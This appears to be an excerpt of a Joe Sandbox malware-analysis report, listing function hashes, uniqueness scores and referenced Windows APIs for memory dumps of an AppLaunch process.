                                                    • Opcode ID: 3da35b42d46d33765551865bb20ba3df22e22737f4fb5e461ae49207c166c8f6
                                                    • Instruction ID: 86752da6dc56af3c2bfb814f95b73fcccabc548189d3f41fbb03d23651e812ff
                                                    • Opcode Fuzzy Hash: 3da35b42d46d33765551865bb20ba3df22e22737f4fb5e461ae49207c166c8f6
                                                    • Instruction Fuzzy Hash: B821C2B59012089FDB10CFAAD984ADEBFF8FB48320F14841AE914A7310D378A954CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0A59A016
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 3970165d2f520a4e87752ba3a9687a1350aad770def403c9f0ea0c47afae5568
                                                    • Instruction ID: 1399244cbbcd9805e5937ceb9a0c482040ab288fe165a2693576af111c6a56f6
                                                    • Opcode Fuzzy Hash: 3970165d2f520a4e87752ba3a9687a1350aad770def403c9f0ea0c47afae5568
                                                    • Instruction Fuzzy Hash: 821142B6C00608CFCB20CF9AC948ADEFBF4BB88220F15851ED829B7210D374A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0A59A016
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: decbfc0c428536c11635790a17bb622d7c23297851f9dfd632d71a4a84ced1ff
                                                    • Instruction ID: 5218904a2cd6202c647a8ac3f045d2f9e5a31017f84f19e6dd146fc3520e299e
                                                    • Opcode Fuzzy Hash: decbfc0c428536c11635790a17bb622d7c23297851f9dfd632d71a4a84ced1ff
                                                    • Instruction Fuzzy Hash: F911F0B6C00249CFDB20CF9AC944ADEFBF4FB89220F15841AD819AB210D375A549CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0A59A016
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: d22318f837a72d02673cd97eb96145dc9185f2b2ddc9fb9ba3293ff2d3561863
                                                    • Instruction ID: 2abe9a6d4bea82a7e66d052f9aaca1600b2e2d2ae88d63a374f73a6f75302af1
                                                    • Opcode Fuzzy Hash: d22318f837a72d02673cd97eb96145dc9185f2b2ddc9fb9ba3293ff2d3561863
                                                    • Instruction Fuzzy Hash: 501123B5C003488FCB20CF9AD944ACEFBF4AF89320F15851AD829A7250C374A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 64a09273b81ed498681c114030324f84563da7856f84130e9c7b76a9c98c6b8c
                                                    • Instruction ID: 49f17cbd12ece8f159771f59024a7faea889284f7980cb9854c9066dd45eee83
                                                    • Opcode Fuzzy Hash: 64a09273b81ed498681c114030324f84563da7856f84130e9c7b76a9c98c6b8c
                                                    • Instruction Fuzzy Hash: A011E8B5D002498FDB50CF9AD544BDEBFF4AB48324F24885AD518A7710C374A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,900A5315), ref: 00FCEC3F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 91ad1a0b58e161b61e0b05ce18cc7dec14f3504d1b8c20ecef12089e3474e22a
                                                    • Instruction ID: 1d1425075b678ec78a6cda41e82a8bc11c9c252868d19b8509935a33b18a7743
                                                    • Opcode Fuzzy Hash: 91ad1a0b58e161b61e0b05ce18cc7dec14f3504d1b8c20ecef12089e3474e22a
                                                    • Instruction Fuzzy Hash: C61106B5C002498FCB20CF9AD684BDEBFF4EB49324F24845AD518A7241C374A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 5cec12d8b049d0c522607e97341e7b612f6dd1861b38b4fdbc68ceb87fc3ac02
                                                    • Instruction ID: a0c2205f4ed46c3d96c47819fb29687c7d2cb903e4168cf4db16f75c6346f236
                                                    • Opcode Fuzzy Hash: 5cec12d8b049d0c522607e97341e7b612f6dd1861b38b4fdbc68ceb87fc3ac02
                                                    • Instruction Fuzzy Hash: 4511E5B5D002498FCB20DF9AD648BDEFFF8AB48324F24885AD518A7300C374A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,900A5315), ref: 00FCEC3F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 2b09941855ecb9343dd461c174b4f9f0a799420f16df95df257a51ab38617f75
                                                    • Instruction ID: ea237c05f771f0a420216358eac1235499a9be1d0245e0f242b13386ee745aca
                                                    • Opcode Fuzzy Hash: 2b09941855ecb9343dd461c174b4f9f0a799420f16df95df257a51ab38617f75
                                                    • Instruction Fuzzy Hash: 7311E5B5C002498FCB20DF9AD684BDEFBF8EB49324F24845AD519A7350C774A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%